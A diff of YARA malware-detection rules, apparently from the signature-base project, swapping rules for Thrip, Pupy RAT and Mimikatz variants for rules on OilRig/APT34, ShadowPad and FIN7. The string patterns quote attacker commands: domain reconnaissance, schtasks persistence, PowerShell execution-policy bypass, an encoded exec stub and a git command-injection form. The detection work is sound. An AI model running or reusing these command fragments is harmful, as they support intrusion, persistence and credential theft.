+		$s1 = "whoami & hostname & ipconfig /all" ascii
+		$s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
+		$s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3dfad33b2fb66c083c99dc10341908b7" or 4 of them )
+		( filesize < 1KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_14 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal3 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "736e2700-cdcb-5165-b786-67edaef765b6"
-		date = "2018-06-21"
+		id = "e5967b39-5d21-5a6a-a1b5-2ec122f16444"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L256-L276"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L168-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c96a40495bc2a17a6215c877ad054bd2e1e10c524c2d54da1955d370b9ccdcd7"
+		logic_hash = "62a6f6c4e574a3c577f0b1fdd85eaa3e775a7ae0e457c59a6b6f741ad895e510"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "67dd44a8fbf6de94c4589cf08aa5757b785b26e49e29488e9748189e13d90fb3"
+		hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\svchost.exe -k " fullword ascii
-		$s2 = "spdirs.dll" fullword ascii
-		$s3 = "Provides storm installation services such as Publish, and Remove." fullword ascii
-		$s4 = "RegSetValueEx(Svchost\\netsvcs)" fullword ascii
-		$s5 = "Load %s Error" fullword ascii
+		$x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii
+		$x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii
+		$x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "InstallA" ) and pe.exports ( "InstallB" ) and pe.exports ( "InstallC" ) ) or all of them )
+		( filesize < 10KB and 1 of them )
 }
 
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_15 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Nov17_13 : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = ""
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd8aa404-4c12-5c8f-a952-a143da858b9b"
-		date = "2018-06-21"
+		id = "c45b8d30-6a5f-5dac-a202-6748ba7b7bd2"
+		date = "2017-11-22"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L278-L299"
+		reference = "https://twitter.com/ClearskySec/status/933280188733018113"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L185-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22769d215e52965f48eb3455b39fbd8f8ce950a67f8132612d42b78fde9822a5"
+		logic_hash = "eab15229f084681b27cec7ed959ef4cd1193a0b38aaed4341dcd6761e2505804"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "231c569f11460a12b171f131c40a6f25d8416954b35c28ae184aba8a649d9786"
+		hash1 = "4f1e2df85c538875a7da877719555e21c33a558ac121eb715cf4e779d77ab445"
 
 	strings:
-		$s1 = "%s\\cmd.exe /c %s" fullword ascii
-		$s2 = "CryptBase.dll" fullword ascii
-		$s3 = "gupdate.exe" fullword ascii
-		$s4 = "wusa.exe" fullword ascii
-		$s5 = " %s %s /quiet /extract:%s\\%s\\" ascii
-		$s6 = "%s%s.dll.cab" fullword ascii
-		$s7 = "%s\\%s\\%s%s %s" fullword ascii
-		$s8 = "%s\\%s\\%s%s" fullword ascii
+		$x1 = "\\Release\\dnscat2.pdb" ascii
+		$x2 = "cscript.exe //T:20 //Nologo " fullword ascii
+		$a1 = "taskkill /F /IM cscript.exe" fullword ascii
+		$a2 = "cmd.exe /c " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6ec70a295000ab0a753aa708e9439b4" or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "0160250adfc97f9d4a12dd067323ec61" or 1 of ( $x* ) or all of ( $a* ) )
 }
-
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_16 : FILE
+rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager_Macro : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
-		author = "Florian Roth (Nextron Systems)"
-		id = "58be9a1b-2228-5d7a-97c9-198cacbe1a66"
-		date = "2018-06-21"
+		description = "Detects OilRig malware"
+		author = "Eyal Sela (slightly modified by Florian Roth)"
+		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L301-L317"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L208-L233"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "950ece29e8fd056e3506684bce9b16eb185d63c1b020e4911972f5fcbdadbe30"
+		logic_hash = "35e540b87bb7425b601fad76f0ff33c60a4d91579fc50f5902d708d06fa755f6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b1c1c6d82837dbbccd171a0413c1d761b1f7c3668a21c63ca06143e731f030e"
 
 	strings:
-		$s1 = "[%d] Failed, %08X" fullword ascii
-		$s2 = "woqunimalegebi" fullword ascii
-		$s3 = "[%d] Offset can not fetched." fullword ascii
+		$one1 = "$c$m$$d$.$$" ascii wide
+		$one2 = "$C$$e$r$$t$u$$t$i$$l$" ascii wide
+		$one3 = "$$%$a$$p$p$$d$a$" ascii wide
+		$one4 = ".$t$$x$t$$" ascii wide
+		$one5 = "cu = Replace(cu, \"$\", \"\")" ascii wide
+		$one6 = "Shell Environ$(\"COMSPEC\") & \" /c"
+		$one7 = "echo \" & Chr(32) & cmd & Chr(32) & \" > \" & Chr(34)" ascii wide
+		$two1 = "& SchTasks /Delete /F /TN " ascii wide
+		$two2 = "SecurityAssist" ascii wide
+		$two3 = "vbs = \"cmd.exe /c SchTasks" ascii wide
+		$two4 = "/Delete /F /TN Conhost & del" ascii wide
+		$two5 = "NullRefrencedException" ascii wide
+		$two6 = "error has occurred in user32.dll by" ascii wide
+		$two7 = "NullRefrencedException" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of them or pe.imphash ( ) == "c6a4c95d868a3327a62c9c45f5e15bbf" )
+		filesize < 300KB and 1 of ( $one* ) or 2 of ( $two* )
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_17 : FILE
+rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager : FILE
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
-		author = "Florian Roth (Nextron Systems)"
-		id = "e314a893-1ef5-5d5f-b056-af25765c0b70"
-		date = "2018-06-21"
+		description = "Detects OilRig malware"
+		author = "Eyal Sela"
+		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
+		date = "2018-01-19"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L319-L343"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L235-L255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0724e07614e704d9ac8a1ae4aecfcf3d9800dde6f83eeecc8427ab6205e321a6"
+		logic_hash = "97debd5e74730e22133f29c89a0cf049862459c24d1b46634a973908040db3a7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05036de73c695f59adf818d3c669c48ce8626139d463b8a7e869d8155e5c0d85"
-		hash2 = "08d8c610e1ec4a02364cb53ba44e3ca5d46e8a177a0ecd50a1ef7b5db252701d"
-		hash3 = "14535607d9a7853f13e8bf63b629e3a19246ed9db6b4d2de2ca85ec7a7bee140"
 
 	strings:
-		$x1 = "c:\\users\\administrator\\desktop\\code\\skeyman2\\" ascii
-		$x2 = "\\SkeyMan2.pdb" ascii
-		$x3 = "\\\\.\\Pnpkb" fullword ascii
-		$s1 = "\\DosDevices\\Pnpkb" wide
-		$s2 = "\\DosDevices\\PnpKb" wide
-		$s3 = "\\Driver\\kbdhid" wide
-		$s4 = "\\Device\\PnpKb" wide
-		$s5 = "Microsoft  Windows Operating System" fullword wide
-		$s6 = "hDevice == INVALID_HANDLE_VALUE" fullword ascii
+		$one1 = "srvResesponded" ascii wide fullword
+		$one2 = "InetlSecurityAssistManager" ascii wide fullword
+		$one3 = "srvCheckresponded" ascii wide fullword
+		$one4 = "IntelSecurityManager" ascii wide
+		$one5 = "msoffice365cdn.com" ascii wide
+		$one6 = "\\tmpCa.vbs" ascii wide
+		$one7 = "AAZFinish" ascii wide fullword
+		$one8 = "AAZUploaded" ascii wide fullword
+		$one9 = "ABZFinish" ascii wide fullword
+		$one10 = "\\tmpCa.vbs" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) and 1 of ( $s* ) )
+		filesize < 300KB and any of them
 }
-rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_18 : FILE
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_1
 {
 	meta:
-		description = "Detects sample found in Thrip report by Symantec "
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "20642526-5a4d-5dca-a6f5-29f19a9b5271"
-		date = "2018-06-21"
+		id = "6a082c5a-ee5b-5002-9148-61bbcfedfe68"
+		date = "2019-04-17"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_thrip.yar#L345-L367"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L267-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cac313bd77900e67f0528d660671394915dff7159ca6fa067fd9c392d7c269a"
+		logic_hash = "afe203fdfcc9dcafb170bee972d45e66e5483a777112a00fa30516dfe81bbf88"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33029f5364209e05481cfb2a4172c6dc157b0070f51c05dd34485b8e8da6e820"
-		hash2 = "263c01a3b822722dc288a5ac138d953630d8c548a0bee080ae3979b7d364cecb"
-		hash3 = "52d190a8d20b4845551b8765cbd12cfbe04cf23e6812e238e5a5023c34ee9b37"
-		hash4 = "1f019e3c30a02b7b65f7984903af11d561d02b2666cc16463c274a2a0e62145d"
-		hash5 = "43904ea071d4dce62a21c69b8d6efb47bcb24c467c6f6b3a6a6ed6cd2158bfe5"
-		hash6 = "00d9da2b665070d674acdbb7c8f25a01086b7ca39d482d55f08717f7383ee26a"
+		tags = ""
+		hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
 
 	strings:
-		$s1 = "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key" fullword ascii
-		$s2 = "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard" fullword ascii
-		$s3 = "LoadLibraryA() failed in KbdGetProcAddressByName()" fullword ascii
-		$s5 = "Unknown Virtual-Key Code" fullword ascii
-		$s6 = "Computer Sleep key" fullword ascii
+		$x1 = "= get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" ascii
+		$x2 = "Write-Host \"excepton occured!\"" ascii
+		$s1 = "Start-Sleep -s 1;" fullword ascii
+		$s2 = "Start-Sleep -m 100;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Git_CVE_2017_9800_Poc : CVE_2017_9800 FILE
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_2
 {
 	meta:
-		description = "Detects a CVE-2017-9800 exploitation attempt"
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1692eec4-a9af-5d00-97b8-badbe0ba0711"
-		date = "2017-08-11"
+		id = "c3bdadfd-2164-5e33-be84-d5d5de8eb048"
+		date = "2019-04-17"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/mzbat/status/895811803325898753"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_9800.yar#L2-L17"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L285-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cfd0c5cb255d3ca63917c41c092df70d68b04f5d210a66abd5e35e509ff4beb"
-		score = 60
+		logic_hash = "57c8f02ebfb05f739fc4791a88be4a981ce7b89e2bd283669f85aae1a5c14d02"
+		score = 75
 		quality = 85
-		tags = "CVE-2017-9800, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"
 
 	strings:
-		$s1 = "git clone ssh://-oProxyCommand=" ascii
-		$s2 = "git clone http://-" ascii
-		$s3 = "git clone https://-" ascii
+		$x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii
+		$x2 = "$t = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" fullword ascii
+		$x3 = "| Where { $_ -notmatch '^\\s+$' }" ascii
+		$s1 = "= new-object System.Net.WebProxy($u, $true);" fullword ascii
+		$s2 = " -eq \"dom\"){$" ascii
+		$s3 = " -eq \"srv\"){$" ascii
+		$s4 = "+\"<>\" | Set-Content" ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		1 of ( $x* ) and 3 of them
 }
-rule SIGNATURE_BASE_Powerkatz_DLL_Generic : FILE
+rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_3
 {
 	meta:
-		description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
+		description = "Detects APT34 PowerShell malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7464f8a1-9f45-580b-8a97-a57071092e3c"
-		date = "2016-02-05"
-		modified = "2023-12-05"
-		reference = "PowerKatz Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powerkatz.yar#L9-L32"
+		id = "361582e7-94e3-5608-9ba9-31fa20c37cf0"
+		date = "2019-04-17"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L306-L326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "979cdb42b54a26960b3173d5ea6abcc5fa61bef57f98b09e55eb4c75f1040a40"
-		score = 80
+		logic_hash = "77ba71a59d6026c4b393bc66af586066e11b0c496367a38d847396a23b3dffbe"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
-		hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
-		hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
+		tags = ""
+		hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"
 
 	strings:
-		$s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
-		$s2 = "%*s  pPublicKey         : " fullword wide
-		$s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
-		$s5 = "\\*.kirbi" wide
-		$c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
-		$c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
+		$x1 = "Powershell.exe -exec bypass -file ${global:$address1}"
+		$x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn"
+		$x3 = "\"\\UpdateTasks\\UpdateTaskHosts\""
+		$x4 = "wscript /b \\`\"${global:$address1" ascii
+		$x5 = "::FromBase64String([string]${global:$http_ag}))" ascii
+		$x6 = ".run command1, 0, false\" | Out-File " ascii
+		$x7 = "\\UpdateTask.vbs" ascii
+		$x8 = "hUpdater.ps1" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Pupyrat_PY : FILE
+
+rule SIGNATURE_BASE_Shadowpad_Nssock2 : FILE
 {
 	meta:
-		description = "Detects Pupy RAT"
+		description = "Detects malicious nssock2.dll from ShadowPad incident - file nssock2.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cdd689e3-437e-514d-a058-fad80ce0639e"
-		date = "2017-02-17"
+		id = "47ecc7f8-065a-558b-9bba-300fd28f4eab"
+		date = "2017-08-15"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_magichound.yar#L10-L29"
+		reference = "https://securelist.com/shadowpad-in-corporate-networks/81432/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shadowpad.yar#L13-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b30bc3082be3229ea2ef5d7c51ab6f97df2f612c80c45892e1a13fde1fb56725"
+		logic_hash = "ea9675d5acfdc80cfa787db2c2dfe2169aa7c5e3ead35f020d0b0b664ecb4bf4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71"
-
-	strings:
-		$x1 = "reflective_inject_dll" fullword ascii
-		$x2 = "ImportError: pupy builtin module not found !" fullword ascii
-		$x3 = "please start pupy from either it's exe stub or it's reflective DLLR;" fullword ascii
-		$x4 = "[INJECT] inject_dll." fullword ascii
-		$x5 = "import base64,zlib;exec zlib.decompress(base64.b64decode('eJzzcQz1c/ZwDbJVT87Py0tNLlHnAgA56wXS'))" fullword ascii
-		$op1 = { 8b 42 0c 8b 78 14 89 5c 24 18 89 7c 24 14 3b fd }
+		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+		hash2 = "c45116a22cf5695b618fcdf1002619e8544ba015d06b2e1dbf47982600c7545f"
+		hash3 = "696be784c67896b9239a8af0a167add72b1becd3ef98d03e99207a3d5734f6eb"
+		hash4 = "515d3110498d7b4fdb451ed60bb11cd6835fcff4780cb2b982ffd2740e1347a0"
+		hash5 = "536d7e3bd1c9e1c2fd8438ab75d6c29c921974560b47c71686714d12fb8e9882"
+		hash6 = "637fa40cf7dd0252c87140f7895768f42a370551c87c37a3a77aac00eb17d72e"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20000KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "c67de089f2009b21715744762fc484e8" or pe.imphash ( ) == "11522f7d4b2fc05acba8f534ca1b828a" ) )
 }
-rule SIGNATURE_BASE_APT_Magichound_Malmacro : FILE
+rule SIGNATURE_BASE_FIN7_Dropper_Aug17 : FILE
 {
 	meta:
-		description = "Detects malicious macro / powershell in Office document"
+		description = "Detects Word Dropper from Proofpoint FIN7 Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad573f52-dbda-5852-ad73-9ef47dd6e7df"
-		date = "2017-02-17"
+		id = "4929dff6-9f33-5d22-b560-c2195440a1cc"
+		date = "2017-08-04"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_magichound.yar#L33-L50"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7_backdoor.yar#L12-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "198c6e7ab957d5c1bb45449b0b2210532e97ed11700f8435201200746e0dfa48"
+		logic_hash = "610b7288e08d36858de88abac3a86dcb6ebba1c019e17fb716f5c26aa964903b"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "66d24a529308d8ab7b27ddd43a6c2db84107b831257efb664044ec4437f9487b"
-		hash2 = "e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6"
+		hash1 = "c91642c0a5a8781fff9fd400bff85b6715c96d8e17e2d2390c1771c683c7ead9"
+		hash2 = "cf86c7a92451dca1ebb76ebd3e469f3fa0d9b376487ee6d07ae57ab1b65a86f8"
 
 	strings:
-		$s1 = "powershell.exe " fullword ascii
-		$s2 = "CommandButton1_Click" fullword ascii
-		$s3 = "URLDownloadToFile" fullword ascii
+		$x1 = "tpircsj:e/ b// exe.tpircsw\" rt/" fullword ascii
+		$s1 = "Scripting.FileSystemObject$" fullword ascii
+		$s2 = "PROJECT.THISDOCUMENT.AUTOOPEN" fullword wide
+		$s3 = "Project.ThisDocument.AutoOpen" fullword wide
+		$s4 = "\\system3" ascii
+		$s5 = "ShellV" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 8000KB and all of them )
+		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of ( $x* ) or all of ( $s* ) )
 }
-
-rule SIGNATURE_BASE_MAL_WIPER_Isaacwiper_Mar22_1 : FILE
+rule SIGNATURE_BASE_FIN7_Backdoor_Aug17 : FILE
 {
 	meta:
-		description = "Detects IsaacWiper malware"
+		description = "Detects Word Dropper from Proofpoint FIN7 Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97d8d8dd-db65-5156-8f97-56c620cf2d56"
-		date = "2022-03-03"
+		id = "906daf88-520b-57b5-825e-29f060b43183"
+		date = "2017-08-04"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_isaacwiper.yar#L3-L29"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7_backdoor.yar#L34-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6fe7d1536db5fc30c9b4a171be66993fc69e6a1d96dae00be4170bdb4a53afb8"
-		score = 85
+		logic_hash = "76818317c543c1464898463741ddaf8c6368d0f5004c088a323c4323db49060c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
-		hash2 = "7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0"
 
 	strings:
-		$s1 = "C:\\ProgramData\\log.txt" wide fullword
-		$s2 = "Cleaner.dll" ascii fullword
-		$s3 = "-- system logical drive: " wide fullword
-		$s4 = "-- FAILED" wide fullword
-		$op1 = { 8b f1 80 3d b0 66 03 10 00 0f 85 96 00 00 00 33 c0 40 b9 a8 66 03 10 87 01 33 db }
-		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 a2 c8 01 10 2b c1 6a 04 }
-		$op3 = { 8d 4d f4 ff 75 08 e8 12 ff ff ff 68 88 39 03 10 8d 45 f4 50 e8 2d 1d 00 00 cc }
+		$x1 = "wscript.exe //b /e:jscript C:\\Users\\" ascii
+		$x2 = "wscript.exe /b /e:jscript C:\\Users\\" ascii
+		$x3 = "schtasks /Create /f /tn \"GoogleUpdateTaskMachineSystem\" /tr \"wscript.exe" ascii nocase
+		$x4 = "schtasks /Delete /F /TN \"\"GoogleUpdateTaskMachineCore" ascii nocase
+		$x5 = "schtasks /Delete /F /TN \"GoogleUpdateTaskMachineCore" ascii nocase
+		$x6 = "wscript.exe //b /e:jscript %TMP%\\debug.txt" ascii
+		$s1 = "/?page=wait" fullword ascii
+		$a1 = "autoit3.exe" fullword ascii
+		$a2 = "dumpcap.exe" fullword ascii
+		$a3 = "tshark.exe" fullword ascii
+		$a4 = "prl_cc.exe" fullword ascii
+		$v1 = "vmware" fullword ascii
+		$v2 = "PCI\\\\VEN_80EE&DEV_CAFE" fullword ascii
+		$v3 = "VMWVMCIHOSTDEV" fullword ascii
+		$c1 = "apowershell" fullword ascii
+		$c2 = "wpowershell" fullword ascii
+		$c3 = "get_passwords" fullword ascii
+		$c4 = "kill_process" fullword ascii
+		$c5 = "get_screen" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "a4b162717c197e11b76a4d9bc58ea25d" or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( 1 of ( $x* ) or all of ( $a* ) or all of ( $v* ) or 3 of ( $c* ) ) ) or 5 of them
 }
-rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_1 : FILE
+rule SIGNATURE_BASE_Susp_Indicators_EXE : FILE
 {
 	meta:
-		description = "Auto-generated rule - file HRDG022184_certclint.dll"
+		description = "Detects packed NullSoft Inst EXE with characteristics of NetWire RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7239a5f3-9c29-57d7-be95-946d14039353"
-		date = "2016-12-29"
+		id = "b4015c24-d18e-51eb-9854-8cc0e6dba4d0"
+		date = "2018-01-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/WVflzO"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L10-L28"
+		reference = "https://pastebin.com/8qaiyPxs"
